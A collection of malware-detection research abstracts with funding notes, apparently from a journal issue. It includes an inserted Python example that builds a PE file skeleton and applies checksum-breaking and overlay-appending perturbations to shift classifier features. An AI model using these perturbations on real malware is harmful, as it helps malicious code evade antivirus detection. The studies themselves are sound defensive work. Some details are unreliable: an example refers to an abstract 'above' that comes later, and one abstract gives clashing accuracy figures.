Abstract: Malware continues to pose a significant threat to cybersecurity, with new advanced infections that go beyond traditional detection. Limitations of existing systems include high false-positive rates, slow response times and an inability to respond quickly to new malware forms. To overcome these challenges, this paper proposes OMD-RAS (Implementing Malware Detection in an Optimized Way through Real-Time and Adaptive Security), an extensive approach aimed at better malware threat detection and remediation. The main steps of the model are data collection followed by comprehensive preprocessing consisting of feature engineering and normalization. Static analysis together with dynamic analysis is used to capture the whole spectrum of malware behavior during feature extraction. The processed features are fed, with a continuous learning mechanism, to an Extreme Learning Machine model for real-time detection. OMD-RAS trains quickly and with high accuracy, providing advanced real-time detection capabilities. The approach uses continuous learning to adapt to new threats, keeping detection effective even as malware strategies change over time. The experimental results show that OMD-RAS performs better than traditional approaches: the OMD-RAS model achieved an accuracy of 96.23% and substantially reduced the false-positive rate across all datasets while maintaining consistently high precision and recall. The model's adaptive learning was also reflected in improvements on other performance measures, for example the Matthews Correlation Coefficient and Log Loss.
Funding: funded by the Deanship of Scientific Research (DSR) at King Abdulaziz University, Jeddah, under grant No. (IPP:421-611-2025).
Abstract: Over the past few years, malware attacks have become more and more widespread, posing threats to digital assets throughout the world. Although numerous methods have been developed to detect malicious attacks, these malware detection techniques need to become more efficient at detecting new and progressively sophisticated malware variants. Therefore, the development of more advanced and accurate detection techniques is necessary. This paper introduces a comprehensive Dual-Channel Attention Deep Bidirectional Long Short-Term Memory (DCADBiLSTM) model for malware detection and risk mitigation. The Dual Channel Attention (DCA) mechanism improves the model's ability to concentrate on the most relevant features in the input data, which reduces false positive rates. The Bidirectional Long Short-Term Memory framework helps capture crucial dependencies from past and future context, which is essential for improving the model's understanding of malware behaviour. As soon as malware is detected, a risk mitigation phase evaluates the severity of each threat and helps mitigate threats earlier. The method achieves an accuracy of 98.96%, outperforming traditional models, indicating that it detects and mitigates several kinds of malware threats and thereby provides a proactive defence mechanism against emerging challenges in cybersecurity.
Funding: funded by Naif Arab University for Security Sciences under grant No. NAUSS-23-R11.
Abstract: In the current digital era, new technologies are becoming an essential part of our lives. Consequently, the number of malicious software or malware attacks is growing rapidly. There is no doubt that the majority of malware attacks can be detected by most antivirus programs; however, such antivirus programs are always one step behind the malicious software. Because of this dilemma, deep learning has become popular for the detection and classification of malicious data, and researchers have focused on finding solutions for malware attacks by analyzing malicious samples with different techniques and models. In this research, we present a lightweight attention-based deep Convolutional Neural Network (DNN-CNN) model for binary and multi-class malware classification, covering benign, trojan horse, ransomware and spyware samples. We applied Principal Component Analysis (PCA) for feature extraction in the binary classification task and used the Synthetic Minority Oversampling Technique (SMOTE) to handle imbalanced data in the multi-class task. The proposed attention-based malware detection model is trained on the benchmark malware memory dataset CIC-MalMem-2022. The results indicate that the model obtains high accuracy for binary and multi-class classification, 99.5% and 97.9% respectively.
Funding: supported and funded by the Deanship of Scientific Research at Imam Mohammad Ibn Saud Islamic University (IMSIU) (grant number IMSIU-DDRSP2504).
Abstract: The rapid evolution of malware presents a critical cybersecurity challenge, rendering traditional signature-based detection methods ineffective against novel variants. This growing threat affects individuals, organizations and governments, highlighting the urgent need for robust malware detection mechanisms. Conventional machine learning-based approaches rely on static and dynamic malware analysis and often struggle to detect previously unseen threats because of their dependence on predefined signatures. Although machine learning algorithms (MLAs) offer promising detection capabilities, their reliance on extensive feature engineering limits real-time applicability. Deep learning techniques mitigate this issue by automating feature extraction but may introduce computational overhead that affects deployment efficiency. This research evaluates classical MLAs and deep learning models to enhance malware detection performance across diverse datasets. The proposed approach integrates a text- and image-based detection framework, employing an optimized Support Vector Machine (SVM) for textual data analysis and EfficientNet-B0 for image-based malware classification. Experimental analysis, conducted across multiple train-test splits over varying timescales, demonstrates 99.97% accuracy on textual datasets using SVM and 96.7% accuracy on image-based datasets with EfficientNet-B0, significantly improving zero-day malware detection. Furthermore, a comparative analysis with existing techniques such as Random Forest, XGBoost and Convolutional Neural Network (CNN) classifiers highlights the superior performance of the proposed model in terms of accuracy, efficiency and robustness.
Abstract: The growing complexity of cyber threats requires innovative machine learning techniques, and image-based malware classification opens up new possibilities. Meanwhile, existing research has largely overlooked the impact of the noise and obfuscation techniques commonly employed by malware authors to evade detection, and there is a critical gap in using noise simulation to replicate real-world malware obfuscation and in adopting a den noising framework to counteract it. This study introduces an image denoising technique based on a U-Net combined with a GAN framework to address noise interference and obfuscation in image-based malware analysis. The proposed methodology addresses existing classification limitations by introducing noise addition, which simulates obfuscated malware, and denoising strategies that restore robust image representations. To evaluate the approach, we used multiple CNN-based classifiers to assess noise resistance across architectures and datasets, measuring significant performance variation. Our denoising technique demonstrates substantial performance improvements across two multi-class public datasets, MALIMG and BIG-15. For example, MALIMG classification accuracy improved from 23.73% to 88.84% when denoising was applied after Gaussian noise injection. This approach contributes to improving malware detection by offering a robust framework for noise-resilient classification in noisy conditions.
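The byte-to-image conversion, Gaussian noise injection and denoising pipeline the abstract above describes, as an added example rather than the paper's code: the row-width schedule is of the kind used for MALIMG-style greyscale images (the KB thresholds are an assumption), a 3x3 median filter stands in for the learned U-Net/GAN denoiser, and the 1 KB sample file is constructed from byte runs a packed section might contain.

```python
import random

WIDTH_SCHEDULE = ((10, 32), (30, 64), (60, 128), (100, 256), (200, 384), (500, 512), (1000, 768))


def image_width(n_bytes: int) -> int:
    """Row width chosen from file size, as in MALIMG-style greyscale images (KB thresholds assumed)."""
    for limit_kb, width in WIDTH_SCHEDULE:
        if n_bytes < limit_kb * 1024:
            return width
    return 1024


def bytes_to_image(data: bytes) -> list:
    """Each byte becomes one 8-bit greyscale pixel, laid out in rows; the last row is zero-padded."""
    w = image_width(len(data))
    rows = [list(data[i:i + w]) for i in range(0, len(data), w)]
    if rows and len(rows[-1]) < w:
        rows[-1] += [0] * (w - len(rows[-1]))
    return rows


def add_gaussian_noise(img: list, sigma: float, seed: int = 0) -> list:
    """Gaussian noise injection standing in for the obfuscation simulation step; clipped to 0..255."""
    rng = random.Random(seed)
    return [[min(255, max(0, round(p + rng.gauss(0, sigma)))) for p in row] for row in img]


def median_denoise(img: list) -> list:
    """3x3 median filter with edge replication: a simple stand-in for the learned U-Net/GAN denoiser."""
    h, w = len(img), len(img[0])
    out = []
    for y in range(h):
        row = []
        for x in range(w):
            window = sorted(img[min(max(y + dy, 0), h - 1)][min(max(x + dx, 0), w - 1)]
                            for dy in (-1, 0, 1) for dx in (-1, 0, 1))
            row.append(window[4])
        out.append(row)
    return out


def mse(a: list, b: list) -> float:
    """Mean squared pixel error between two images of equal shape."""
    n = sum(len(r) for r in a)
    return sum((p - q) ** 2 for ra, rb in zip(a, b) for p, q in zip(ra, rb)) / n


# Constructed 1 KB "file": runs of zero padding, int3, nop and 0xFF bytes, as a section might contain.
SAMPLE = b"\x00" * 256 + b"\xcc" * 256 + b"\x90" * 256 + b"\xff" * 256


def demo(sigma: float = 25.0) -> dict:
    """Clean image, noisy image and restored image; returns the shape and the two error levels."""
    clean = bytes_to_image(SAMPLE)
    noisy = add_gaussian_noise(clean, sigma, seed=1)
    restored = median_denoise(noisy)
    return {"shape": (len(clean), len(clean[0])), "mse_noisy": mse(noisy, clean),
            "mse_restored": mse(restored, clean)}
```

`demo()` turns the 1 KB sample into a 32x32 image, corrupts it and restores it; the restored image sits much closer to the clean one than the noisy one does, which is the effect the paper measures downstream as recovered classifier accuracy. A median filter only works this well because the constructed sample is made of flat byte runs; for real code bytes, which are high-frequency, a learned denoiser is needed, which is the paper's point.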
Abstract: The growing threat of malware, particularly in the Portable Executable (PE) format, demands more effective methods for detection and classification. Machine learning-based approaches show their potential but often neglect the semantic segmentation of malware files, which can improve classification performance. This research applies deep learning to malware detection, using Convolutional Neural Network (CNN) architectures adapted to work with semantically extracted data to classify malware into families. Starting from the MalConv model, this study introduces modifications that adapt it to multi-class classification and improve its performance. It proposes a new method that extracts bytes from PE malware files according to their semantic location, yielding higher accuracy in malware classification than traditional methods that use full byte sequences. This approach evaluates the importance of each semantic segment to improve classification accuracy. The results reveal that the header segment of PE files provides the most valuable information for malware identification, outperforming the other sections and achieving an average classification accuracy of 99.54%. This reaffirms the effectiveness of the semantic segmentation approach and highlights the critical role header data plays in improving malware detection and classification accuracy.
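The PE manipulations of the black-box adversarial-example abstract above (Overlay Append and Break Checksum) and the split of a PE into header, section and overlay bytes by semantic location from the abstract immediately above, as one added example that is not code from either paper: a minimal PE32 skeleton is constructed in memory, the two perturbations are applied, a byte-histogram distance shows the feature-space shift they cause, and the file is cut into its semantic segments. The checksum routine follows the documented PE image checksum algorithm (as reimplemented in tools such as pefile) and assumes a dword-aligned CheckSum field; the skeleton is a structural sample, not a runnable Windows program, and Section Append is not shown.

```python
import struct

OPT_CHECKSUM_OFFSET = 64        # CheckSum field offset inside the optional header (PE32 and PE32+)
OPT_SIZEOFHEADERS_OFFSET = 60   # SizeOfHeaders field offset inside the optional header
FILE_ALIGN, SECT_ALIGN = 0x200, 0x1000


def _align(n, a):
    return (n + a - 1) // a * a


def build_minimal_pe(code: bytes = b"\xc3" * 16) -> bytes:
    """Constructed PE32 skeleton (MZ stub, PE signature, COFF + optional header, one .text section)."""
    e_lfanew, opt_size, n_sections = 0x40, 0xE0, 1
    hdr_size = _align(e_lfanew + 4 + 20 + opt_size + 40 * n_sections, FILE_ALIGN)
    raw_size = _align(len(code), FILE_ALIGN)
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, n_sections, 0, 0, 0, opt_size, 0x0102)
    std = struct.pack("<HBBIIIIII", 0x10B, 14, 0, raw_size, 0, 0, SECT_ALIGN, SECT_ALIGN, 0)
    win = struct.pack("<IIIHHHHHHIIIIHHIIIIII", 0x400000, SECT_ALIGN, FILE_ALIGN, 6, 0, 0, 0, 6, 0,
                      0, SECT_ALIGN * 2, hdr_size, 0, 3, 0x8140,   # CheckSum placeholder = 0
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(code), SECT_ALIGN, raw_size, hdr_size,
                       0, 0, 0, 0, 0x60000020)
    headers = dos + b"PE\x00\x00" + coff + std + win + b"\x00" * 128 + sect  # 128 = 16 empty data dirs
    return set_checksum(headers.ljust(hdr_size, b"\x00") + code.ljust(raw_size, b"\x00"))


def parse_pe(data: bytes) -> dict:
    """Minimal parser: header fields, section table and overlay (bytes past the last section)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    sections = []
    for i in range(n_sections):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\x00").decode(), raw_ptr, raw_size))
    end = max((p + s for _, p, s in sections), default=len(data))
    return {"checksum_offset": opt + OPT_CHECKSUM_OFFSET,
            "stored_checksum": struct.unpack_from("<I", data, opt + OPT_CHECKSUM_OFFSET)[0],
            "size_of_headers": struct.unpack_from("<I", data, opt + OPT_SIZEOFHEADERS_OFFSET)[0],
            "sections": sections, "overlay": data[end:]}


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """PE image checksum: end-around-carry sum of every dword except the CheckSum field, folded to
    16 bits, plus the file length (the imagehlp CheckSumMappedFile algorithm)."""
    padded = data + b"\x00" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:   # assumes a dword-aligned field, true for this skeleton
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return (total + len(data)) & 0xFFFFFFFF


def set_checksum(data: bytes) -> bytes:
    off = parse_pe(data)["checksum_offset"]
    buf = bytearray(data)
    struct.pack_into("<I", buf, off, pe_checksum(data, off))
    return bytes(buf)


def checksum_valid(data: bytes) -> bool:
    info = parse_pe(data)
    return info["stored_checksum"] == pe_checksum(data, info["checksum_offset"])


def break_checksum(data: bytes) -> bytes:
    """'Break Checksum' perturbation: only the CheckSum field changes; nothing the loader maps does."""
    info = parse_pe(data)
    buf = bytearray(data)
    struct.pack_into("<I", buf, info["checksum_offset"], (info["stored_checksum"] + 1) & 0xFFFFFFFF)
    return bytes(buf)


def overlay_append(data: bytes, payload: bytes) -> bytes:
    """'Overlay Append' perturbation: bytes after the last section are never mapped by the loader."""
    return data + payload


def semantic_segments(data: bytes) -> dict:
    """Split by semantic location: header bytes, each section's raw bytes, and the overlay."""
    info = parse_pe(data)
    segments = {"header": data[:info["size_of_headers"]]}
    for name, ptr, size in info["sections"]:
        segments[name] = data[ptr:ptr + size]
    segments["overlay"] = info["overlay"]
    return segments


def l1_shift(a: bytes, b: bytes) -> float:
    """L1 distance between normalized byte histograms, a common static feature vector."""
    ha = [a.count(bytes([v])) / len(a) for v in range(256)]
    hb = [b.count(bytes([v])) / len(b) for v in range(256)]
    return sum(abs(x - y) for x, y in zip(ha, hb))


def demo() -> dict:
    original = build_minimal_pe()
    evasive = overlay_append(break_checksum(original), b"\x90" * 1024)   # constructed junk overlay
    return {"sections_unchanged": parse_pe(original)["sections"] == parse_pe(evasive)["sections"],
            "checksum_valid": (checksum_valid(original), checksum_valid(evasive)),
            "feature_shift": round(l1_shift(original, evasive), 3),
            "segments": sorted(semantic_segments(evasive))}
```

`demo()` reports that the section table is unchanged, that the stored checksum no longer matches, and that the byte histogram has moved: the loader never maps the overlay and does not enforce the checksum for ordinary user-mode executables, which is why these perturbations keep behaviour intact while shifting static features. `semantic_segments` returns the same split a segment-wise classifier consumes, and for the header segment it is the `SizeOfHeaders` bytes, untouched by either perturbation.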
Funding: funded by Institutional Fund Projects under grant no. (IFPDP-261-22).
Abstract: Detecting cyber attacks in networks connected to the Internet of Things (IoT) is of utmost importance because of the growing vulnerabilities in smart environments. Conventional models such as Naive Bayes and the support vector machine (SVM), as well as ensemble methods such as Gradient Boosting and eXtreme Gradient Boosting (XGBoost), are often plagued by high computational costs, which makes real-time detection challenging. In this regard, we propose an attack detection approach that integrates Visual Geometry Group 16 (VGG16), the Artificial Rabbits Optimizer (ARO) and a Random Forest model to increase detection accuracy and operational efficiency in IoT networks. In the proposed model, features are extracted from malware images with VGG16, and prediction is carried out by the Random Forest model using those features; ARO is used to tune the hyper-parameters of the Random Forest model. With an accuracy of 96.36%, the proposed model outperforms the standard models in terms of accuracy, F1-score, precision and recall. The comparative study highlights the success of our strategy, which improves performance while maintaining a lower computational cost, making the method effective and well suited to real-time applications.
Funding: funded by the Deanship of Scientific Research at Princess Nourah bint Abdulrahman University, through the Research Funding Program, Grant No. (FRP-1443-15).
Abstract: Analysis of Android malware shows that this threat is constantly increasing and is a real danger to mobile devices, since traditional approaches such as signature-based detection are no longer effective against its continuously advancing sophistication. To resolve this problem, efficient and flexible malware detection tools are needed. This work examines the possibility of employing deep CNNs to detect Android malware by transforming network traffic into image representations. The dataset used in this study is CIC-AndMal2017, which contains 20,000 instances of network traffic across five distinct malware categories: Trojan, Adware, Ransomware, Spyware and Worm. These network traffic features are converted to image formats for deep learning, which is applied in a CNN framework including the VGG16 pre-trained model. Our approach yielded high performance: an accuracy of 0.92, an accuracy of 99.1%, a precision of 98.2%, a recall of 99.5% and an F1 score of 98.7%. Subsequent improvements to the classification model through changes within the VGG19 framework raised the classification rate to 99.25%. The results make clear that CNNs are a very effective way to classify Android malware, providing greater accuracy than conventional techniques. The success of this approach also shows the applicability of deep learning in mobile security, along with a direction for the future development of real-time detection systems and further deep learning techniques to counter the increasing number of emerging threats.
Funding: supported by Princess Nourah bint Abdulrahman University Researchers Supporting Project number (PNURSP2025R104), Princess Nourah bint Abdulrahman University, Riyadh, Saudi Arabia.
Abstract: In today's digital world, the Internet of Things (IoT) plays an important role in both local and global economies due to its widespread adoption in different applications. This technology has the potential to offer several advantages over conventional technologies in the near future. However, its growth also attracts the attention of attackers, which introduces new challenges for the research community that range from hardware and software security to user privacy and authentication. We focus on a particular security concern, malware detection. The literature presents many countermeasures, but inconsistent results on identical datasets and algorithms raise concerns about model bias, training quality and complexity. This highlights the need for an adaptive, real-time learning framework that can effectively mitigate malware threats in IoT applications. To address these challenges, (i) we propose an intelligent framework based on Two-step Deep Reinforcement Learning (TwStDRL) that is capable of learning and adapting in real time to counter malware threats in IoT applications. The framework uses exploration and exploitation during both the training and testing phases, storing results in a replay memory; the stored knowledge allows the model to navigate the environment effectively and maximize cumulative reward. (ii) To demonstrate the advantages of the TwStDRL framework, we implement and evaluate several machine learning algorithms for comparative analysis, including Support Vector Machines (SVM), Multi-Layer Perceptron, Random Forests and k-means clustering. The selection of these algorithms is driven by the inconsistent results reported in the literature, which cast doubt on their robustness and reliability in real-world IoT deployments. (iii) Finally, we provide a comprehensive evaluation to justify why the TwStDRL framework outperforms them in mitigating security threats. In our analysis, the proposed TwStDRL scheme achieves an average performance of 99.45% across accuracy, precision, recall and F1-score, an absolute improvement of roughly 3% over existing malware-detection models.
Funding: This work was funded by the Deanship of Graduate Studies and Scientific Research at Jouf University under Grant No. (DGSSR-2023-02-02178).
Abstract: The dominance of Android in the global mobile market and the open development characteristics of the platform have resulted in a significant increase in malware. These malicious applications have become a serious concern for the security of Android systems. To address this problem, researchers have proposed several machine-learning models to detect and classify Android malware based on features extracted from Android samples. However, most existing studies have focused on the classification task and overlooked the feature selection process, which is crucial for reducing training time while maintaining or improving classification results. This paper proposes a new Android malware detection and classification approach that identifies the most important features to improve classification performance and reduce training time. The approach consists of two main steps. First, a feature selection method based on the Attention mechanism selects the most important features. Then, an optimized Light Gradient Boosting Machine (LightGBM) classifier classifies the Android samples and identifies the malware. The proposed feature selection method integrates an Attention layer into a multilayer perceptron neural network; the role of the Attention layer is to compute a weight for each feature according to its importance for the classification process. Experimental evaluation shows that combining the Attention-based technique with an optimized classification algorithm for Android malware detection improved the accuracy from 98.64% to 98.71% while reducing the training time from 80 to 28 s.
Abstract: Detecting malware on mobile devices running the Android operating system has become a critical challenge in cybersecurity, given the rapid increase in the number of malware variants and the frequency of attacks targeting Android devices. In this paper, we propose a novel intelligent computational method to enhance the effectiveness of Android malware detection models. The proposed method combines two main techniques: (1) constructing a malware behavior profile and (2) extracting features from the malware behavior profile using graph neural networks. Specifically, to construct an Android malware behavior profile effectively, this paper proposes an information enrichment technique for the function call graph of malware files, based on new graph-structured features and semantic features of the malware's source code. Additionally, to extract significant features from the constructed behavior profile, the study proposes using the GraphSAGE graph neural network. With this method, a variety of significant malware features are represented, synthesized and extracted. The approach to detecting Android malware proposed in this paper is new and has not been explored in previous research. Experimental results on a dataset of 40,819 Android applications indicate that the proposed method performs well across all metrics, with particularly strong accuracy and recall of 99.03% and 99.19%, respectively, outperforming existing state-of-the-art methods.
Funding: The authors would like to thank Princess Nourah bint Abdulrahman University for funding this project through the Researchers Supporting Project (PNURSP2024R435); this research was also funded by Prince Sultan University, Riyadh, Saudi Arabia.
Abstract: The widespread adoption of Internet of Things (IoT) devices has resulted in notable progress in different fields, improving operational effectiveness while also raising privacy concerns because of their vulnerability to malware attacks. This study proposes an advanced approach that uses machine learning, specifically the Wide Residual Network (WRN), to identify hidden malware in IoT systems. The research aims to improve privacy protection by accurately identifying malicious software that undermines the security of IoT devices, using the MalMemAnalysis dataset. Thorough experimentation provides evidence for the effectiveness of the WRN-based strategy, with strong performance on accuracy, precision, F1-score and recall: on the test data, multiclass accuracy exceeds 99.97% and binary accuracy exceeds 99.98%. The results emphasize the strength and dependability of advanced deep learning methods such as WRN for identifying hidden malware in IoT environments, and a comparison with the existing literature underlines the originality and efficacy of the proposed methodology. This research builds on previous studies that investigated several machine learning methods for detecting malware on IoT devices, but distinguishes itself through its performance metrics and its validation with thorough experimentation on real-world datasets. WRN offers benefits in managing the intricacies of malware detection, emphasizing its capacity to enhance the security of IoT ecosystems. In summary, this work proposes an effective way to address privacy concerns on IoT devices using advanced machine learning methods, and provides insight into the changing landscape of IoT cybersecurity through methodological rigor and comparative performance analysis. Future research could focus on enhancing the recommended approach by adding more datasets and leveraging real-time monitoring capabilities to strengthen IoT devices' defenses against new cybersecurity threats.
Abstract: Despite only being around for a few years, mobile devices have steadily risen to become the most extensively used computer devices. Given the number of people who rely on smartphones, which can install third-party apps, it has become an increasingly important issue for end-users and service providers to ensure that both the devices and the underlying network are secure. People will become more reliant on applications such as SMS, MMS, Internet Access, Online Transactions, and so on due to such features and capabilities. Thousands of devices ranging from low-cost phones to high-end luxury phones are powered by the Android operating system, which has dominated the smartphone marketplace. It is about making it possible for people from all socioeconomic backgrounds to get and use mobile devices in their daily activities. In response to this growing popularity, the number of new applications introduced to the Android market has skyrocketed. The recent appearance of a wide range of mobile malware has caught the attention of security professionals and scholars alike. In light of the ongoing expansion of the mobile phone industry, the likelihood of it being used in criminal activities will only continue to rise in the future. This article reviews the literature on malware detection and prevention in Android mobile devices, analyzes the existing literature on major studies and tasks, and covers articles, journals, and digital resources such as Internet security publications, scientific studies, and conferences.
Funding: Princess Nourah bint Abdulrahman University and Researchers Supporting Project Number (PNURSP2024R346), Princess Nourah bint Abdulrahman University, Riyadh, Saudi Arabia.
Abstract: The growing usage of Android smartphones has led to a significant rise in incidents of Android malware and privacy breaches. This escalating security concern necessitates the development of advanced technologies capable of automatically detecting and mitigating malicious activities in Android applications (apps). Such technologies are crucial for safeguarding user data and maintaining the integrity of mobile devices in an increasingly digital world. Current methods employed to detect sensitive data leaks in Android apps are hampered by two major limitations: they require substantial computational resources and are prone to a high frequency of false positives. This means that while attempting to identify security breaches, these methods often consume considerable processing power and mistakenly flag benign activities as malicious, leading to inefficiencies and reduced reliability in malware detection. The proposed approach includes a data preprocessing step that removes duplicate samples, manages unbalanced datasets, corrects inconsistencies, and imputes missing values to ensure data accuracy. The Minimax method is then used to normalize numerical data, followed by feature vector extraction using the Gain ratio and Chi-squared test to identify and extract the most significant characteristics using an appropriate prediction model. This study focuses on extracting a subset of attributes best suited for the task and recommending a predictive model based on domain expert opinion. The proposed method is evaluated using Drebin and TUANDROMD datasets containing 15,036 and 4,464 benign and malicious samples, respectively. The empirical result shows that the Random Forest (RF) and Support Vector Machine (SVC) classifiers achieved impressive accuracy rates of 98.9% and 98.8%, respectively, in detecting unknown Android malware. A sensitivity analysis experiment was also carried out on all three ML-based classifiers based on MAE, MSE, R2, and sensitivity parameters, resulting in a flawless performance for both datasets. This approach has substantial potential for real-world applications and can serve as a valuable tool for preventing the spread of Android malware and enhancing mobile device security.
Abstract: With the ever-increasing continuous adoption of Industrial Internet of Things (IoT) technologies, security concerns have grown exponentially, especially regarding securing critical infrastructures. This is primarily due to the potential for backdoors to provide unauthorized access, disrupt operations, and compromise sensitive data. Backdoors pose a significant threat to the integrity and security of Industrial IoT setups by exploiting vulnerabilities and bypassing standard authentication processes. Hence, its detection becomes of paramount importance. This paper not only investigates the capabilities of Machine Learning (ML) models in identifying backdoor malware but also evaluates the impact of balancing the dataset via resampling techniques, including Synthetic Minority Oversampling Technique (SMOTE), Synthetic Data Vault (SDV), and Conditional Tabular Generative Adversarial Network (CTGAN), and feature reduction such as Pearson correlation coefficient, on the performance of the ML models. Experimental evaluation on the CCCS-CIC-AndMal-2020 dataset demonstrates that the Random Forest (RF) classifier generated an optimal model with 99.98% accuracy when using a balanced dataset created by SMOTE. Additionally, the training and testing time was reduced by approximately 50% when switching from the full feature set to a reduced feature set, without significant performance loss.
Funding: Supported by the Institute of Information & Communications Technology Planning & Evaluation (IITP) Grant funded by the Korea government, Ministry of Science and ICT (MSIT) (No. 2017-0-00168, Automatic Deep Malware Analysis Technology for Cyber Threat Intelligence).
Abstract: Antivirus vendors and the research community employ Machine Learning (ML) or Deep Learning (DL)-based static analysis techniques for efficient identification of new threats, given the continual emergence of novel malware variants. On the other hand, numerous researchers have reported that Adversarial Examples (AEs), generated by manipulating previously detected malware, can successfully evade ML/DL-based classifiers. Commercial antivirus systems, in particular, have been identified as vulnerable to such AEs. This paper firstly focuses on conducting black-box attacks to circumvent ML/DL-based malware classifiers. Our attack method utilizes seven different perturbations, including Overlay Append, Section Append, and Break Checksum, capitalizing on the ambiguities present in the PE format, as previously employed in evasion attack research. By directly applying the perturbation techniques to PE binaries, our attack method eliminates the need to grapple with the problem-feature space dilemma, a persistent challenge in many evasion attack studies. Being a black-box attack, our method can generate AEs that successfully evade both DL-based and ML-based classifiers. Also, AEs generated by the attack method retain their executability and malicious behavior, eliminating the need for functionality verification. Through thorough evaluations, we confirmed that the attack method achieves an evasion rate of 65.6% against well-known ML-based malware detectors and can reach a remarkable 99% evasion rate against well-known DL-based malware detectors. Furthermore, our AEs demonstrated the capability to bypass detection by 17% of vendors out of the 64 on VirusTotal (VT). In addition, we propose a defensive approach that utilizes Trend Locality Sensitive Hashing (TLSH) to construct a similarity-based defense model. Through several experiments on the approach, we verified that our defense model can effectively counter AEs generated by the perturbation techniques. In conclusion, our defense model alleviates the limitation of the most promising defense method, adversarial training, which is only effective against the AEs that are included in the training classifiers.